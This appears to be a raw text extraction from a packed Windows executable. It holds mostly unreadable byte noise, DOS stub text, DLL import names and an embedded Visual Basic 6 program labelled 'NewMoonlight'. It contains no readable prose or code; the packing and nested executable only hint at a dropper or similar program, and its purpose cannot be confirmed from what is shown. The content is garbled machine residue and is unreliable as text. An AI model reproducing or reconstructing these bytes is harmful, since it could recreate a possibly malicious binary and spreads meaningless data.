PlQRP\LPQPj
L\RlP|QERMPUQERMPUQRj
@L\QlR|PUQERMPUQERMPQj
SVWeE %@
L!This program cannot be run in DOS mode.
uT3~#m#
Fm;|EP?L$
(!xm&_<[
W 6V@eKID-v?
<hTWePE$L;
(u$&$}
(!$-[n#
+x@;qt&
YT!99,@xt
|lhAmx`\
,1Td P
BHD dyN<8}@t0,AE
u)| V2
@ty u9
ygXw<'
_hHSHwrLY
$j (vpR
i2Dw+;
lQmQ$$;S
MPRHL{6
5S=3AR
;1;}#+$
Ct8~4
QRT-'E
QRK* H?c
^&N0F1
3^SW"x
Y~g_//NZ$M6]Omt
eEOu_[^(7_
'x}tC'>=
jUV~.=
}TQ;v5
azZeqW
I*tw5L{++
j.'XH:K
FQ>j)z
;W:HN?0T
r?c<F^%af
caw}-4U
4E~#=<t~;sv+`,wf9v
xvu)C+
+f]IPn8|rZ`
Q]'OuA3$
m<}oo9Hp
|Rs64|
4((Up`
EEU<Ot5g+=*9-5 -%9V
%wbb]OF#A?0K,hOAuA#t?Wsl
xk}3LP#
F$vw)!hz|
L~|m;v
PDEw]w
)U#P8=V
YF>?[ed]|`AG/u's[Pso_
khlrR_
O[T%yXJ
;u&PzW8
5rpuSQ
QV#$H!(=c2
="/t G
R[ j/P3Cq
)Rk#dShOP}LpQ<G`e7
}urVZ}\
<49"eW=E
,"D4Uh@TW
uAvD@W,
$%D;pwuuLQf
TolVZWEb
d3eG;G\HD
|$V0PY
.MXypH
DRP^(=
`sB=4[
C2PS%|kAKfPf
3;si",$$
34,gr47
\@;|;!V
A7.A.t
*8@$19
JP#<GH
SUU0VWF!"f
D|adu C
f$S=jV0%
%W]Z=gfPC5
`S}o1C</tK<:tG<\tCAg~
k6RV-(u
C]|ob
Q3;WucO(
S3;vM8\
Pq\qPtI\
]4}wgc
3;tbFVY&
!8[T~4ShX$(V
30@.4o3q*Sn oe~
V)L;G[M
V",E[Hb
zuFQD.
Wxipw#|
Wc<R]0
BQujVfzu
&;9$I W
j 9y:P
q2!WV\`5
-kF:WGu
jf#CH(
YNs^(
jovhJhB$
.Xl73BWM
v |,-g&
H|v<#w>
` !H@uf
ldf:u;,"g
;w`i+\$tSz@iJ
Wj3,xD
HABQ@6hg6Cd
;@P|B!}Z
mGgO`It
'gU4*L0|I<aIk4=
vEUaL{Ur%u
=bS( UN(
>|x@;~
0z+eO<
u^3?.O
N;"~0a
8Ut\Ot%%+
*)F7n2
S5~U]H
VW,=<t
CB#;t<CF
"9|jW@
F|MUUV|7
;`p}&:+
^)0P=Nuy8&
RP-Pp*rc
j"=tLv!wL
0x^.2=zC@
OFb?P"V
SH5=vbd
QN}urbqZw
!{x`u%
@>nkY-VP
x|_{f]s:f?
L|:w,,
Xd "Tv8v
VjhA|M
y@P)*)Tk3
",N7J8
cY0*9sf
(7f_%8;
X[H;r!4
797;~AW
r;rEPw1m
<SVX'%n
<?t#<*t<[t
]\k][?u
PoA7*uV>
q-FRW<[
]FI?(-;
sEl`IXt;
/iq;. SRVgP
n}U<!f75S
W\;r0,
y@raT-
.?vvA*
+u3/ +W
]v.FG]mUsne
WSTw~p
P%P\t
\(e(@bQpR$6E
74bgvu_2
",T4R%d{
#m4u_!P%
A`=Zx\GO0u
((VW8hWHL
RWPujI|xoT
9=POFT>
]Q nN| $VR_w
/4{!^]5,
[PSc5M
bt!3l(\*sM
PRSJ2ddrY0'[t
&z2HlIT
BdQ1t!
Z{;^HUY~6
*-bDt/
8<PYi(t
P0Im-,=_
cQPH$@E
-e<rH^
UV`Wux
""cI\E
+Z(V\$$
I)H;`v
w0Fv;6&
F z]`&
F/)#0uatnZX
W3P/R(Y
^| $bm-$~
G"(_ZD9+@`W
/S_4D<Uu
.d6E+</M~st/EqPCIP!
2&XS^?14$Q>_)
x;?UVL
[+rR+3
'boty/SVM@
.LPB@Rj
hS_V,W2
.VMD;B
SZ-~6z
u+*F0z
jdHMI}$D
2`A@lx{81\
8n/s2#~
<QVKTc
08ctM'
0W&8V/tO
s8Eia9V$
F N@PG
<TZdqCMR ]}6">4
ZDyBU>%D$#VvH)
yjlXX3
@whR_F
*ZSDfF7V
C^2%Mc%7
G O@vC
P#}a'3
VWWhQ<^_I
P0|'<_
T;$]&ft2}
TROENa!y
g4PLF$weyN
|ChG.]
oqug>DR
SX3K0$.
Qtwo*bGpH
Qf7@E.%2)9@H
$7DB3,,J
Sp22[t7
\`2222dhlpY5t\
EFf#3d#
8CWSXu
`'iZrA%
Spf<dH.-d
Gzk"k<E
8)[zgNy
MD=JaH
Buj=
CMUQnERpq
|RA|qlt%4NPV
LXp6(PpU
qb@.WW(@
tC]*><R
Fl=Ku|>;u(96u g8
\tH`gcdh
hA9]tF
8_D<|
+:Pt`;:u
XR;5vr
^}i'Et
e9""$GT*r
d>sVySOC\
`tt,Q\UVu|u7up
z2hu`[
9u]XS-b
bz=i5u1jt%_
{Np?tt3/
OH&EgXj
U;+O`4
`SuwC]]
vC](_,
Z]_Q>(5
0PEG(Xw
'/uLQj
Jc!tI4l
8q0NU<
p?LbR,P
L!.X yl
s<tF @F@*;g
('~\7JFcW}G\
2$N|X#8Q
R3DOEPk
rF8'|#HDE5
>_4X7Q(E
(*H&>6Ch
Q8qG>`URWG0t~uIME"
B9huc$,9CG!|)`
PHx$L5+
w)]ps
L]rewTVA0
VJ=l6B
u[3R"E
t0{U6kx
{>EzDRW
_=kn.r
4Ci.Ajk4:
}Y`\a0W_Z{)Q#H
;^#bB}M
76j$7r7$ma7
9uS]oq
"W@9 <*
^/H(i[
5ZF!{WA`9C
yL^Im2
`P$ BD,V
c=G`B
g@a;NL`
8g":c
@W@?5yt
QInMa
09(|$`
P;/hu21
[)]3mb
Sx&i/_
<+C(*8
)eHP;/
B(.iU`'IGS4
&:+iC)
9t8Zk$
+90/P5T
iu2;=&.4
X95<qHDUQ;~{`MEg
-.8G^ w
(g>K<L
{V@C3G{
-uV"-#T,v
s/ 8/14z
zEl+c{l)J&2Y0(
"#'&8!
XopL=}IlfS&['gYlL3Y%$f
G0d+0p
M,b%*^4J+++
H{+v:lt(X"#U
/4Ra#C
jeO,3P
/.@;ipD/
D8wg.KA
'lCU4j
'0?f;M
9,l<wc
=(0tcQ
F8)x(,I
675"4g
ha5$y0./@#-,
c?*PA/a
(hKJf(MY7dLY*Q
9ePON!Ye0UTS
owF)? ,o(4@:
?q\$DD
!?Iv4;5Ns
VZ>RtLBL,3L<C\./-,H
\MVOiz
j?!6)@
s[E:^M,CB'#iED
RnB*^E
V:SZw}AS%
U33[Es
e~_[k5}@uJ8
!<=gH;:uA
bX%-Jz(LKu
,+g4t@
PRSZo[ah
r|Rtn'
^AL_87GZ;
p8;-5rcs
xGH`EaV;SF
HPqQx8C;
NHNQ+,
-]t!PH
1^(fx+]t
1huL3&
p!N64g
utE~@;t;Q
4_UVb6
DaK2=O
]TD+Hm
| 5WV $
.V)3*+a
n0{W}0
I444W!4_N,
,PQA U
r!'$D$
]pv!VSK'
V4V8q]\US]j&
XG ywV<5R01
)aGm\Hxft
Je5)(DWI
~b~H=E
HM__G5ta
{u _v
>S^<;[t
GQYh2K
n]+Vgw"
YgK^^Pt
EN{dSj/n,
EMc)9"8PA#
$U/8r8?
PXR$ Z
nQ-$/PR4(
X^w[L!
#&'$;vE
Z/6A\4
{^0kF<PQ
D<O4.v
}#BA<'Q
HUc`n;X
j@Ap/PI
#])3<3{N
xuL9E/(ct
f:z<Rf9
%#pt!\
Y@kp@,
{iNw&7
'h!5WyCU
xw(m|pA
s\=::T
?JD"l)!rYnH:t0<;t,c#B
SRs0&w
bAimUT
1VCljQiB
dJwK6"(
"~M$pN
Q(|.@-
Yu!a={561
m AXx|
+d$TY_63s ]
=#E;S2
P)B;Bei
[=Y5M]|pk}kQc
m=P$Mu
Md74X^7|F
4L7C`;
mmd071GZ3
u-V?Ywu
'O[^_WxhN
[xW8jAOdA
yW,3;tj
:td9T^
}HMV%~2
M</+'@kw/,2< }
y~+;v#W}
,_{$QaN
_]'}E8$(;t
OOu.u!OOu
}9Ji+=
=D_)Ow
GF 7\(m)jY
~jYHOgVE
2$]Ou|
2~|h}}^(
h%bptcO)
O(x >w"HY
at4H']#
^9zs/r
+;#|r>M)Ag
[O7*u#;
+PSM/K6T7)
ERu^_[B8
Ci8t'tn
PiB!2#`
)\`kbP;F7?Lt>S6,
WG]1S(i
jzI./.
S?uo!K
GIt%[[)?u[:Q
m:/KuJ
]"tl0]U
uD~Eu#j
N|Vw/!
WsCx<K
Suq4s
v/VET1uI\
Oo[ICH9O;
^`=GZnw
PS[*j
R5.p(v8S
-Q==SLp
Bufa30t^K
usU\+s
1U33gjI;7f
m1%/>+
Bu?Y9(
a;YY4Hu10
u'$(+@g{^J
TVQLff
_,9DaW
[iYp \X
gVYHzBoW
H-&j"Y
0tkJzO+aW]{
z!>;!:=/
_l/7G6Y=Z1$
_9}E(wFI=
Fz]hQ;
4.@J\Wg
:|%jrE3v#
~|-][u
.LY3;W&>
Mt"$VSb
yt`!u
j]Wc}Y
)YOkm~%
pk%O=e
@}Y.tTP|y
,B_t=P#
1B6,u$
9$IHO@
D~;s#9
1M8;>G
!M1+F5R
oa=\cj
&(tMj)^#
mOftM
@A9)P-'6
uxtsO`
}8_&K:
8$8EL>
h%xCKh
S}V$'O<
j7xs!_W{
}7%A-$lxjAr6
7)j],IAi;=|D
\T*TuA>"u>M
x,'E0
|)QGJq
&{tM!9
Nw45Ds^. y
Oq7W3:@
x}(WEau?;
#f8MZu
E,O}-vK<hF
zJ}>j,
BOg=wYqp
xi kCHeg-f
|&7]['x
P$"hF6
j?ZwqKKiL s
!y!JA=\4{
0]i]p&+u"
p;Ao";tcLq{q@
u&21K=v-9o>
y'^bQ\o
SQ?ev?,{
#xieRC%
Q+QH"
Klx_%
D;#~W#
3uYHy6s|s
6_5hmot
J'k(-U
^C8EZ_#
tE3Lu_
JCJnxa
O^E|8a#\D
Sl1Y]E
})OKt"
u^:<iN]
WqANCoiD
pw<GH
_$l8kO
__iEH+
O1/_HK
KYK,YY\
FKm\3HgS
98u61CO
J#JE1H&=I
atv@e9
W~0B&Y`
|?3?ru9A
-DxNt/
m}DmBv
u&GA Z
;r Oi3>
F'O?h4~
uVMV?p
41-)Y1T
^;P$|CFsN\
9Ui7{U
4V\1q1
)Er4As~
~q`se&
uB:wEi
;w+Cv'Ws
iltj7]a0 |"
X_p??.;$t(v
R=XP/YQ
VC20XC00x
arctEV`u5kaT
NNhravM
F080$mb@
7H"O} a}9X
U|M (Jz(Pk(8H.w
I5)FG_
k<fV[w(Z
k-'EJ+
PSj? eni,jhWq[)
:62`?I
rdvzq0
+02/%?4,^\
+(#>F6OPdl8
i:uN[kcg
;WB=W?
,;}scAfA
0UU;P79L
=;|A%#2QH
iDt03Pax}
1G#GhO@S
@QI$HU
a E1\"?s8
H1KG`U
[R6.nE
<w(*Dp
2H8:<Px;
btHHt.
@C=u.xiQ-
0Aj{;t7pu!Y`7.
[8n:$7, O<pO
X^:nbfU^
}O{Z}@P
DQ6H]a$Gr
S#+%0{ s4#%v(!{
@DjaP=!V|
h1G6xQ
_u]}_9c_,b
`32&>|e
%,M+MZ
@giR+ia"H|
maw\EOw
+(Utbj
^9u0/0A7
TLD<44
,DDM4MB4
-R 4c9
iC'oI9
W KWtE!)
1$!&n2[)V98C
H_SFZu
Xk|Msr/
#Y)Sm
A6u$UW
x-DCeN
FtTILu7}%}E6u,
49u#{e
'E"mht
@3N}[q
S<Ct}q
3~ nt(
5W$K}+av
-A~m{`O
NMOSe|L-Gm}
ufQ\E6
E!aHqv
&R8k~J
kb{0sE
\uskj0[*
xD{3|]u
]t_G<kAY
:o:w!e
jsEXPaX
(xuO)!
$By]+A
5SuMF$
O;+YpA%N
EW3>'0P
A/Nb;
9U. |
GeY) 3+t;-
GGN 31
mv1,hn@g
[eZih#X/
Z"xtCk
fm0~BZ
Y@mHPZg
r$GEPNA
Z9/}}2
(tuYUA
Lt3{Y`,E
0YH:)gu
Q6;.{IA|Y
'Td<+3q(t
to$AvMI+z
5/6 YLz
uYAzt!
@*7w%
IDJ}90
Lg3MP*=Y|!
*hM4v6}
SYf}~!
Pm?K::D
AcQ9f:P.A,
b.ba4p.V
[qI66F
- *7!$+(!,&d,-0.
0L2!8D<,GE@F2!DGHH,GLLIPJ2!
TKXGLL\M`!
,NdOL2h8l9
,Gp:t;L2!x<|wB=OBF
>&?F&dd@AL
L)U$K' +
3Fh;L+v
8<l'%@D
2HLP C0TX
2 ptx$|
14;^t>)
=[qHt#
'{W!8HA1@
gE_YK\
,0O&uK$}<;
+k+G,*l#s!-tpG3kP
*T+Uw ,V@D-$
~/VjSe0
#"{E#4M0
x2kbZZ~
k@?PP02
~,8]t'i
d-J%f
CA$&x&.!0AD11#\L/
.s) :-`
DL>{,N
PHl%+hsOM
Nx@;EVhfH
N02`C~5Ph
]*|C`?%
\nz4<V7q
N>OJGA~Z)^9
vmhg.}k"Y$
A"=:P1_
g@gEjxia)7f%
t@:P}_A##
tOSO|i;+SB;t9&x"Wkt
iZP@Mt14,
u(k}J5j[
@@=|ll
;#pC;+
,a9Fv((
}_uk,m
sZ~a^z@h
UO87aA!"J
}PSP;g
1A#H}F*
Pey`
Ud`^cMF
\=8t9
U%YE?"kk
7{!U]:h>S$D
_SOHSk
7?8"utD
w_F9C=
wefXVB
\FcR A
-SU*h[
Bzt!(d
4/t2jFN#9U
gO]JCAlr
Nct<At
z\up:PA*!h[
uX^A|V
pB<v)3P|
6Oa@7_&
($]0tWFM
j,iO[o2
fPC t_h
!WNPNP
$,4G;A
_u@WPW
eo?[7'9]
y3]9}C u
AEAj )QB
r"=8]t
2;z1as2
)W5ppy
M1-5w-
Op[R?j
_0B=2|V<
(D"=Gt,={!<z=w
@'vAAC
@=ewlrSqW`
RxT/S)tu
WU#;w
'BBB%_[jX[*rV,
YGm:V=ViFcK
%Kc1ar
t&Uj=eY$[;t@I3;|
Hzt>k
8Z"'O@W%|C?
/o24<(
+mO@MS
[7.WwY+
#S@L|m
m]uAWx!>(P+,t
Ml^1]z3
VP YuRr
#7Ju*+}
XZbTBY
X5e!FCa
P+\3T*]"
*;(ggx_uM;Q?^SCbCtGWYE}
oOp7N<tk&^xuw
8fe{0sC
,0F>`!
G7sPkS
.'y3tU
G3~1>Mvu
lx;o]
'G8t,A<
tQQ@$
0VWj1bTL
g_Gl,WZRtP{y t
ICTH)Qub
$UpSMoE
cHS$U(
,uFWW-4
}<EX:6
?MM%;w[t2E
X<v/YT@
tE~C9M#
%,?J43;VVVd%%f:4
hu-VVg@t
5VVC"%Wi;
}WW^}%9
Xs988:p
oA*S^6V
0*Hh=-EU
RlqQ8U
ctWp .P)
& XN]]
=3 "KK
vBW!f)"
]"8+pE0q.+WW
.vmX*R
0,*!r[
CP%FpUIr7Cb{f*-X$~n=
RuaJ|[
sePdD.
PAP. fS
A'[/`QywE
wS8/kY
E3}+?8X
Ku 0Hq
ig/&8**
vDt}l'
8D E$5yp:UPH';f"SW
+B:Q~48Yf<
i:pleSoD
0N?=>[xXI7~u,
A),dr+
7t0'Ht
L'%/S_
TT)9H$
tS>!J~a.uC
qlf;ufo-S
!\JU?x(7"DRi
i0P%^@
=tQ-\F60:u
e}Vtl_7NeW;
@0M-`E6
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMY:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkal
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
l/@LC_TIME
MONETARYCTYPEZ
OLLKnATEA
__GLOBe_HEAP_SELEEDn-`SVCRT/`CnMonTueWedThuFriSat5nFebMarApr
lAugSe
pOctNovDec~TZUv
PX (y8PX
])dn]l
Paggu&Uru
Ar1ntinaHPe_VColombi$
D+Qic; R
outh Afr.^m
Luxe9stagCSwitz
tIaCnd>p
i.s- 5dOra&rU)EnglxfF'"GOn/B?Mgium
Mexo/asq
Tcu{`;Y_-7
kqg'mh#dk & tob
UvakGg<o-,k-'i+
ew-ahggmV*
bte;/ci
ksss-f
i'u?k '?X
D'n^Jmi
.di{gW' s#
v'cIidgr7`fc/r'J['gGb]ivDa>
eMKzqOn/
sk'),1kO
'htsso5q
f'a|fL
k4-y7il/v
jG=irev-`ib+
aT`i7b
ttM[t'sa;0S'mpVV
:/MrrI
'wLOSS#
SING_?OMA%#R60U~28
- abl6m
a hpo.
GN7t.gqTNcGf\;
qao63<std5
rW+CgKcF c
opecU27
cW82<nIc3
Y_lock
AuAm_0xK9!UmH!
\V8</{
uPsV2f'
tup{"MdM[b
sf+VcTC++ R
7H:myd
, Mnk
AH{bp{
t)q15R
ne}ic0v
ny~vfG
vn^NfF>]
~3GetLaA?!Popup&Wi
ageBoxA
C=32.d
cmdM<exe/\
jHNhUKoc memory_*G zip l=t
\~ZDf5gC'y
z`d%Q[o{-b/$
uwmd7X
Orivgh-$^z
v*X~erboseunp#{.t
rqQuietnz9
Q'DOSNJk SF=
XozEnc
rNd^F8
ViA?ffs
s0ptsq
zdB])U[
2919
-leJd:dull&J
t'oF--
cEy[wl
O;6Hdo!
AB6plxk_tupj[p
bi*lMtOn gic`fz
|SeSby3
Lm&Bb#
7>0Axy
sbvh09.]buff
:;,=+"[]<>| /
$At!oYx:\
\\^YfZ
zQtfE6
=u,GwM
->d%%v
vp T(ofXa}
NffmDZ#
Gw#!r+bV
urd,-f
GF-ABF
dbKGyk8&
ypwi)^d[d;U
AmNPce5&!
s.]05O
W--biP
eXGZtGI{%2d
eaph CJDG3%nc'=-f+
@ge,+xx
d$ h2nbx\
9if;b
Rv%F`>O
-daX xgbu mdo
hh8A,[
[a%s:R(
#USqFt!
run,F+ 6eM
o-gV,y
Sx,15,H~!!X:`F?McK
[W]%XQ
e-u--=
02x,.X
k@:!IX=^z
UyZsd@&
%byaA;(
kK~sitb) !=QBj9qla3
_u0x4xN
\x fqg`P,w-HI
Eype(Qm( .WTb
3VHI>X
`85:F
o5fd%n
p?|rQK\
FC,iMz
3~l&$a
65AC6l
Yl/mV lip
4Z,2 Xu<0
F00e=7!
g:YwM4M
x_p40a
ybFIN
>1dSVESWE22-2EUQ4
-MVMEX
c07xDEApALUT
9h2%EN\S
"X`_DN`
W_C<CA
0GTMW+3S$CHE
W 20VV
\EN$4O?COL(8s%
RPER,J
HcSARG
030FECU9J44L
CHL88+sYURY<cZ@ZP/~
GBRC HNCZE.
|NLDHKGNZLa
|PRItSVKdNXKOldH<(TTO
ZHHI.CHS
ap?\T
BYYIJZYST G
\Ho8,mw/(
NPTBp^4+m
`P7<z
FEGYHMYNI|AhYYZXRDU4
\xLy<z
af50`y!O
_j2=Ws1~
<840,ii(
4MsM4Mi5^A
4MxldXL
4MHD<(
GetDriveTypeAM[^Lea
{RelseMuox
Wa=ForSoL[-ObjJ
)CloAH
eLdExch+g(t
2HpF#e
V4R!,l[rcmpi
u1PhNamn7
<To[3O+Loj
u'Curn%SC
vWidUr]`8
-l+e_-uqlm
K#hp0nlen_d+
8(TvIPTSae1n
S[E$-ZGWTewPUkdPi5PVmrDeCA[WrPoimOsh"Bj
fa LCI_D
W/-nB\:pa!A
Addrc
:T7eni
`;@`yL
89K}i#|l0Q1Op
6wvsptf
%.'$M{
;|-7CG
"9\akp
>EM+/@cB}d)O
)]bq)!
-_.1%0g/"5F
\5=[]u
!V}r{4O
XS<1#*BW!
3|CDxA
v0lC 33
iF%HO0[
WN_7=Y[
3h%E1
C& 85<9
R+5>I(
:1+E%G
@.MOD
re4w]O!0
[dZSB>
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
LoadLibraryA
GetProcAddress
OpenProcessToken
wvsprintfA
ZIP32.dll
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
5lJE@.F
:@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:cx>zx:@
2eTH@$2@
>e@>@0Ae@A@05@
@@$<x@<@0J`
5lJE@.F
C@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:\x>zx:@
C@p<pp<@
5lJE@.F
:@HAc`A@
0`x9gx9@
5pJE@.F
C@HAe`A@
:\x>zx:@
TH@$1@
JJ@.5@
>eHM@0>@
HQ@0:@
TR@$1@
HQ@0:@
A|HO@0M
TQ@$<@
qMzxM@
]Tp]@p@
5lJE@.F
=@HAm`A@
0`x9gx9@
5pJE@.F
C@HAp`A@
:\x>zx:@
<^xAex<@
Fyx:yxF@
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
`.data
R9N&Yk
I7$(CC
!FHlv9
e%:gKhCy
3 dOidogL
G%Hotgai
O,O/imM
#1?aIA$
C70a4>N
KERNEL32ADV
APIiUS5
pLibra[
&Hk~ -
&SVers'
}7)nJK7MThd
n,5-Wh
&lbUhI
a7*nx4
gZV[EWiWhK
,G5\6,*
u1>xlH&[
%Kj;E4[
P+uffm[
`<<<<U
7P+vkm7RoU+J
>uaq<W
y|E<,;m}2
H@Ekm)lQC.)F0!5_CE.A09k
5@6'/n@@F6y5.Ok
>@b5lJn.
_px=fC
9`xnBpv
Yx^X[<9
c4C2p`\p`!Gp
[,+n^([
Z("4[:
rn=&d6
>`T2`M
Af&>\+\k|
H+eT$5ee`>{
00T,8|
:O<9.2
<<>AO7
v>mo77+\$W7:T
4$y&7Kx@0`\
yVHpyCgye\CFxq4/
\@qT<TdA
qqgF<5 Tx:C
)99Q2)L
HsQy95[
2 llll
4`LLOeq&[
1^H1niF=V:<5
5qlw-/MvMN.d
p`$\73'E^MkY<`OO/3=TD
v/Avp[^
X:VEgr:al>Q@L`L`Z
p@+lpeeepeVgEx\
u1T1@qETX$+U2c(9
\1T@tM
e1Tp Xp 2pWWlBp
Wp=p$W%1T$iM
?Ug;<f
6QMM[#^Q~Qa!]6O0/l@
P9q8rphlH0n
`/$l2M6N
+6E+._QbyTTA*$RR@4-.QQ4mb.OO
G]9n0fX&
Q:.O=l(M=AO
ua>7'xy+0xOMK?L.Lp0K
g'@QA
JO7Jz]">o@9
'>ONm@_>y+X/~
_0lzvA
[.VRt;)v
GZ|oH7x
M499;;,y
CGz8Gv<
QJfdv
#em'm^
rQ6$mmm
LdLQ\X
X5:6]T]
/^&1<u+V;
V+nV;WCo1B@ePC`
`>pBZsF$
MmheslFFX
M< 9{0d0<c<y1_T<4cX
T<d\QFF/2}
adj_fptan?4DIku
|[CAry
57div_nm64k
+m1B,J
b"3 5CV
u)ERQ
)@E}`rG?V
rq1Pn{w.0
AEVENT_SIN-K_
DFuna4
I%Ompac,
vqrudseJ
^x-$aoy[`
2-,Dj<
}ZeZ/d$K#%U
FUu?isj
dff,mxw"%
O.mtp^
+@Oad=c
GPGWHU
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
MSVBVM60.DLL
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
L!This program cannot be run in DOS mG
.imports
NewMoonlight
FrmMain
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
